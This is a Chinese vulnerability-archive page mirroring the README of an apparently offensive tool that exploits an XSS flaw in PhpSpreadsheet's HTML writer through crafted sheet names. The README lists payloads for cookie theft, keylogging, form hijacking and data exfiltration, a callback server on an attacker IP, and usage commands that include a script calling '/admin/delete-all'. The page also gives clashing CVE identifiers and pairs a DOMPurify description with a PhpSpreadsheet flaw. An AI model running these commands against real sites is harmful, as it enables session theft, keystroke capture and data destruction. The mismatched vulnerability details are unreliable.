支持本站 — 捐款将帮助我们持续运营

目标: 1000 元,已筹: 1000

100.0%
立即捐款

POC详情: cb418944705d58cd9d35968609444be1f9112b7c

来源
https://github.com/roj1py/CVE-2024-47875-PhpSpreadsheet-XSS-PoC
关联漏洞
标题:DOMPurify 跨站脚本漏洞 (CVE-2024-47875)
Description:DOMPurify是Cure53个人开发者的一款使用JavaScript编写的,用于HTML、MathML和SVG的DOM(文档对象模型)。 DOMPurify 2.5.0之前版本和3.1.3之前版本存在跨站脚本漏洞,该漏洞源于容易受到跨站脚本攻击。
Description
This is a PoC/Exploit for the CVE-2024-47875 PhpSpreadsheet XSS Vuln
介绍
# CVE-2025-22131 • PhpSpreadsheet HTML Writer XSS (PoC)

## Over View 
this is a PoC on the **CVE-2025-22131** , a Cross-Site Scripting (XSS) vulnerability in PhpSpreadsheet versions prior to 2.2.2, 2.1.2, and 1.29.4. The vulnerability resides in the generateNavigation() function, which fails to sanitize sheet names during XLSX-to-HTML conversion, enabling malicious JavaScript injection.

CVE ID: CVE-2024-47875

GitHub Advisory: GHSA-79xx-vf93-p7cx

Affected Versions: PhpSpreadsheet < 2.2.2, < 2.1.2, < 1.29.4

Author: Roj

License: MIT

Repository: [PoC Repo](https://github.com/roj1py/CVE-2024-47875-PhpSpreadsheet-XSS-PoC)

---
## Features
📄 Generates malicious XLSX files with customizable XSS payloads

🛠️ Supports multiple payload types:

cookie_theft: Steals session cookies

redirect: Redirects users to an attacker-controlled site

alert: Displays a test alert for PoC

keylogger: Captures keystrokes

form_hijack: Intercepts form submissions

data_exfil: Exfiltrates data from a specified endpoint

🌐 Built-in HTTP server to capture exploit callbacks

⬆️ Uploads malicious XLSX files to a target endpoint

💾 Saves captured data (e.g., cookies) to a JSON file

🎨 Colorized terminal output for enhanced readability

🔍 Verbose logging for debugging

---
## Usage
```bash
python exploit.py -h
```
🚀 Usage Examples:
```bash
#Basic cookie theft attack
python3 exploit.py http://target.htb 10.10.16.50

# Custom upload endpoint
python3 exploit.py http://app.htb 10.10.16.50 -e /api/file-upload

# Different payload types
python3 exploit.py http://target.com 10.10.16.50 -p keylogger
python3 exploit.py http://target.com 10.10.16.50 -p redirect
python3 exploit.py http://target.com 10.10.16.50 -p form_hijack

# Custom XSS payload
python3 exploit.py http://target.com 10.10.16.50 --custom "<script>fetch('/admin/delete-all')</script>"
```
---
I wich to get feedbacks , wich luck to all of you
文件快照

 [4.0K]  /data/pocs/cb418944705d58cd9d35968609444be1f9112b7c
├── [ 25K]  exploit.py
├── [1.0K]  LICENSE
└── [1.9K]  README.md

0 directories, 3 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。